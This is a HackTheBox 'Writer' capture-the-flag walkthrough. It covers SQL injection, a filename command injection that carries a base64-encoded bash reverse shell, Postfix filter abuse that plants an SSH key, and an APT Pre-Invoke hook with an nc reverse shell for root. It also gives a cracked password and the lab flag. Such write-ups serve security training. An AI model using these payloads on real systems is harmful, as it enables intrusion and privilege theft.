HackTheBox - Writer

Morten Hansen • January 30, 2022

Writer

Nmap: SMB and web (HTTP) ports are open.

Gobuster finds paths such as /static and /administrative.

sqlmap finds a username and password hash, and can also read files from disk. That lets us pull the site's source code and see how the application works.

<ip>/administrative lets us log in and edit blog posts. While editing a post we upload an image whose filename carries a command injection:

shell.jpg;`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4yLzQ0NDQgMD4mMQo=|base64 -d|bash`;

The base64 decodes to the reverse-shell payload bash -i >& /dev/tcp/10.10.16.2/4444 0>&1, i.e. the equivalent of /bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.2/4444 0>&1". Encoding it keeps spaces, slashes and redirections out of the filename itself.

Then edit the post again and click save while intercepting the request with Burp Suite. Change the image URL to a file:// path that points directly at our uploaded file, e.g.:

file:///var/www/writer.htb/writer/..../something.jpg; payload and forward the request. From the source code we know the site is written in Python and that it passes this filename into an os.system() command, so the shell metacharacters in the name are interpreted by the shell.
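To make concrete why a filename like the one above executes, here is an added example; it is not the site's code (the real Writer source is not reproduced on this page). A hypothetical store_upload_vulnerable() builds a shell command string from the filename the way an os.system() call would, next to a hardened store_upload_safe() that whitelists the filename and passes arguments as a list so no shell parses them. Both use a harmless echo in place of the site's real file-handling command, and subprocess.run(..., shell=True) stands in for os.system() only so the output can be captured; the shell semantics are identical.

```python
import re
import subprocess

# Same shape as the injected filename from the page, but with a harmless
# command in place of the reverse shell: the backticks expand to
# "echo INJECTED", which the shell then runs as a command of its own
# between the two semicolons (the page's payload does the same with
# "...|base64 -d|bash").  Constructed test input.
INJECTED_FILENAME = "shell.jpg;`echo echo INJECTED`;"

# Whitelist: plain names only (letters, digits, dot, dash, underscore),
# no leading dot, max 64 characters.  No shell metacharacters can pass.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-][A-Za-z0-9._-]{0,63}")


def is_safe_filename(filename: str) -> bool:
    """True only if the whole string matches the whitelist."""
    return SAFE_NAME.fullmatch(filename) is not None


def store_upload_vulnerable(filename: str, upload_dir: str) -> str:
    """Hypothetical vulnerable pattern: the user-controlled filename is
    interpolated into a command string that /bin/sh interprets.

    os.system(cmd) behaves the same way; subprocess.run with shell=True is
    used only so the shell's stdout can be returned and inspected.
    """
    cmd = f"echo saving {filename} to {upload_dir}"  # BUG: unquoted user input
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def store_upload_safe(filename: str, upload_dir: str) -> str:
    """Hardened version: reject anything but a plain filename, then pass
    the arguments as a list so the kernel execs the program directly and
    no shell ever sees the name."""
    if not is_safe_filename(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    proc = subprocess.run(
        ["echo", "saving", filename, "to", upload_dir],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


def was_injected(output: str) -> bool:
    """True if the marker command ran on its own line, i.e. the injection worked."""
    return "INJECTED" in output.splitlines()


if __name__ == "__main__":
    print(store_upload_vulnerable(INJECTED_FILENAME, "/var/www/uploads"))
    try:
        store_upload_safe(INJECTED_FILENAME, "/var/www/uploads")
    except ValueError as err:
        print(err)
    print(store_upload_safe("shell.jpg", "/var/www/uploads"))
```

Running it shows the vulnerable path printing "saving shell.jpg" and then "INJECTED" as a separate command's output (the trailing "to /var/www/uploads" becomes a failed command on stderr), while the hardened path refuses the name before any process is started.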

The injected command runs when the post is saved and, with an nc listener waiting on port 4444, we get a shell. From that shell we look through the writer2 directory and find a password hash in the MySQL server:

pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= NULL 1 kyle kyle@writer.htb 1 1 2021-05

Crack it with hashcat (mode 10000, Django PBKDF2-SHA256) and we get the password marcoantonio.
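Before trying the cracked password everywhere it is worth confirming it offline against the dump. The following is an added example, not from the original page: it parses the Django pbkdf2_sha256 string above into algorithm, iteration count, salt and digest (the same fields hashcat mode 10000 consumes), recomputes the hash with hashlib exactly as Django does, and compares in constant time. The round-trip check at the bottom uses a constructed salt and password rather than kyle's real hash, so the result can be checked here without the cracked password.

```python
import base64
import hashlib
import hmac
import secrets
import string
from dataclasses import dataclass

# kyle's hash as dumped from the MySQL server (copied from the page).
KYLE_HASH = (
    "pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$"
    "bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A="
)


@dataclass
class DjangoPBKDF2:
    iterations: int
    salt: str
    digest: bytes  # raw 32-byte PBKDF2-HMAC-SHA256 output


def parse_django_hash(encoded: str) -> DjangoPBKDF2:
    """Split Django's "pbkdf2_sha256$<iterations>$<salt>$<base64 digest>"."""
    algorithm, iterations, salt, digest_b64 = encoded.split("$", 3)
    if algorithm != "pbkdf2_sha256":
        raise ValueError(f"unsupported hasher: {algorithm}")
    return DjangoPBKDF2(int(iterations), salt, base64.b64decode(digest_b64))


def django_pbkdf2_sha256(password: str, salt: str, iterations: int) -> str:
    """Encode a password the way Django's PBKDF2PasswordHasher does:
    PBKDF2-HMAC-SHA256 over the UTF-8 password with the ASCII salt."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), iterations)
    return f"pbkdf2_sha256${iterations}${salt}${base64.b64encode(dk).decode()}"


def verify_password(encoded: str, candidate: str) -> bool:
    """Recompute the digest for a candidate and compare in constant time."""
    parsed = parse_django_hash(encoded)
    dk = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), parsed.salt.encode(), parsed.iterations
    )
    return hmac.compare_digest(dk, parsed.digest)


def random_salt(length: int = 22) -> str:
    """Alphanumeric salt of the same length as the one in the dump."""
    alphabet = string.ascii_letters + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(length))


def demo_roundtrip(password: str = "marcoantonio") -> bool:
    """Hash a constructed password with a fresh salt and 260000 iterations
    (matching the dump), then check that verify accepts the right password
    and rejects a wrong one.  Uses a constructed salt, not kyle's."""
    encoded = django_pbkdf2_sha256(password, random_salt(), 260000)
    return verify_password(encoded, password) and not verify_password(encoded, password + "x")


if __name__ == "__main__":
    parsed = parse_django_hash(KYLE_HASH)
    print(f"iterations={parsed.iterations} salt={parsed.salt} digest={len(parsed.digest)} bytes")
    print("round-trip ok:", demo_roundtrip())
```

With the real hash, verify_password(KYLE_HASH, "marcoantonio") is the one-line check to run before spraying the password at SMB and SSH.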

enum4linux can be used to enumerate SMB.

Try the password against SMB and SSH for the users kyle and john.

SSH as kyle works. User flag: 997b385ebdb90b8f26ff1fe8bdc9f7ae

Inside as kyle, upload pspy64 and watch the processes. Postfix is running with a content filter: mail is piped through /etc/postfix/disclaimer, the filter runs with its group set to filter, which kyle belongs to, and the script is executed as john when a mail is delivered.

This means anything we put into the disclaimer script runs as john every time a mail passes through the filter.

Create a mail script in /tmp that sends one message through the local Postfix so the filter fires:

#!/usr/bin/python3
# Send one mail through the local Postfix (127.0.0.1:25) from kyle to john.
# Delivery runs the content filter, which executes /etc/postfix/disclaimer.
import smtplib
from email.message import EmailMessage

message = EmailMessage()
message.set_content('Test')
message['Subject'] = "Fjas"
message['From'] = 'kyle@writer.htb'
message['To'] = 'john@writer.htb'

# The context manager closes the connection, so no explicit quit() is needed.
with smtplib.SMTP('127.0.0.1', 25) as smtp_server:
    smtp_server.send_message(message)

Then edit /etc/postfix/disclaimer (writable by the filter group) and add a line that appends our public key to john's authorized_keys, for example:

echo "ssh-rsa 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 kali@kali" >> /home/john/.ssh/authorized_keys

Send the mail with the script above; the disclaimer runs as john and installs the key.

Then SSH in as john and fetch his id_rsa:

-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----

SUID

Two SUID binaries are flagged with CVE hints, but those CVEs target other platforms and kernel versions and are not the way forward here:

-rwsr-sr-x 1 daemon daemon 55K Nov 12  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)

-rwsr-xr-x 1 root root 31K May 26 11:50 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)

A group john belongs to has write access to /etc/apt/apt.conf.d, and pspy64 shows that apt update runs regularly from a cron job (every 2 minutes). Dropping a config file into that directory with an APT::Update::Pre-Invoke hook makes apt run our command before every update:

echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.2 4444 >/tmp/f"};' > /etc/apt/apt.conf.d/pwn

Set up a listener on 4444 and wait for the next run of the cron job; since it runs apt as root, the reverse shell comes back as root.